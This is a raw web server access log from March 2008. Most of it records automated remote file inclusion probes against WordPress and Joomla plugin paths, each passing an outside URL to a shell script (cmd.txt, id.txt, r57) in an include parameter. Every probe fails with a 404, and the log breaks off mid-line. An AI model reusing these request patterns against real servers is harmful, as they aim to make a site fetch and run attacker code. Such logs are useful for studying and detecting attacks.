85.214.66.204 - - [04/Mar/2008:09:49:13 -0800] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:49:13 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:49:13 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.52.249 - - [04/Mar/2008:09:49:28 -0800] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.50.52.249 - - [04/Mar/2008:09:49:28 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.50.52.249 - - [04/Mar/2008:09:49:28 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:09:49:53 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:09:49:54 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:50:13 -0800] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.124.143.236 - - [04/Mar/2008:09:50:28 -0800] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.124.143.236 - - [04/Mar/2008:09:50:28 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.124.143.236 - - [04/Mar/2008:09:50:29 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:09:50:46 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.165.64 - - [04/Mar/2008:09:50:51 -0800] "GET /logs/access_080119.log/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [04/Mar/2008:09:51:54 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [04/Mar/2008:09:51:55 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [04/Mar/2008:09:51:55 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:09:52:09 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:09:52:09 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:09:52:09 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:09:52:09 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:53:24 -0800] "GET /logs/access_080211.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:53:26 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:53:26 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:09:53:27 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.126.130 - - [04/Mar/2008:09:54:06 -0800] "GET /logs/access.log/index.php?option=com_user&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.126.130 - - [04/Mar/2008:09:54:06 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.126.130 - - [04/Mar/2008:09:54:07 -0800] "GET /logs/index.php?option=com_user&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:54:20 -0800] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:54:20 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:54:21 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:54:26 -0800] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:54:27 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:54:27 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:54:38 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:54:53 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:54:53 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:54:53 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:55:08 -0800] "GET /logs/access_080127.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:09:55:37 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:56:37 -0800] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:56:38 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:56:38 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.124.143.236 - - [04/Mar/2008:09:56:38 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.124.143.236 - - [04/Mar/2008:09:56:39 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.124.143.236 - - [04/Mar/2008:09:56:48 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:09:56:52 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:09:56:53 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:56 -0800] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:56 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:56 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:57 -0800] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:57 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:57 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:57 -0800] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:58 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:58 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:58 -0800] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:59 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:56:59 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:57:08 -0800] "GET /logs/access_080211.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:57:08 -0800] "GET /logs/access_080211.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:57:09 -0800] "GET /logs/access_080211.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:57:10 -0800] "GET /logs/access_080211.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [04/Mar/2008:09:57:32 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:57:39 -0800] "GET /logs/access_080211.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:57:57 -0800] "GET /logs/access_080101.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:57:57 -0800] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:57:57 -0800] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.108 - - [04/Mar/2008:09:58:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.103 - - [04/Mar/2008:09:58:00 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.124.143.236 - - [04/Mar/2008:09:58:02 -0800] "GET /logs/access_080221.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:09:58:06 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:58:38 -0800] "GET /logs/access_071230.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:09:59:34 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:09:59:34 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.204 - - [04/Mar/2008:09:59:37 -0800] "GET /logs/access_080211.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.4.3 - - [04/Mar/2008:10:00:17 -0800] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [04/Mar/2008:10:00:17 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [04/Mar/2008:10:00:17 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:10:00:29 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:10:00:29 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:10:01:43 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:10:02:18 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:10:02:49 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:10:02:50 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:10:02:59 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:10:03:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.7.168 - - [04/Mar/2008:10:03:49 -0800] "GET /logs/access_070612.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.170 - - [04/Mar/2008:10:03:56 -0800] "GET /logs/access_070810.log HTTP/1.0" 200 58508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.204 - - [04/Mar/2008:10:04:56 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:10:04:57 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:10:04:58 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.52.249 - - [04/Mar/2008:10:06:07 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.50.52.249 - - [04/Mar/2008:10:06:07 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.50.52.249 - - [04/Mar/2008:10:06:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:10:06:36 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.230 - - [04/Mar/2008:10:06:47 -0800] "GET /minamijewelry/?M=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:10:06:54 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.86 - - [04/Mar/2008:10:07:10 -0800] "GET /logs/access_080103.log HTTP/1.0" 200 448825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:10:07:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:10:07:17 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.195.58.172 - - [04/Mar/2008:10:07:56 -0800] "GET /logs/access_080131.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:10:08:01 -0800] "GET //include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:10:08:01 -0800] "GET /logs//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
218.50.52.249 - - [04/Mar/2008:10:08:08 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.116.6.178 - - [04/Mar/2008:10:08:57 -0800] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.76.31.154 - - [04/Mar/2008:10:09:01 -0800] "GET /logs/index.php?incl=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:10:09:16 -0800] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:10:09:17 -0800] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:10:09:18 -0800] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:10:09:21 -0800] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.ph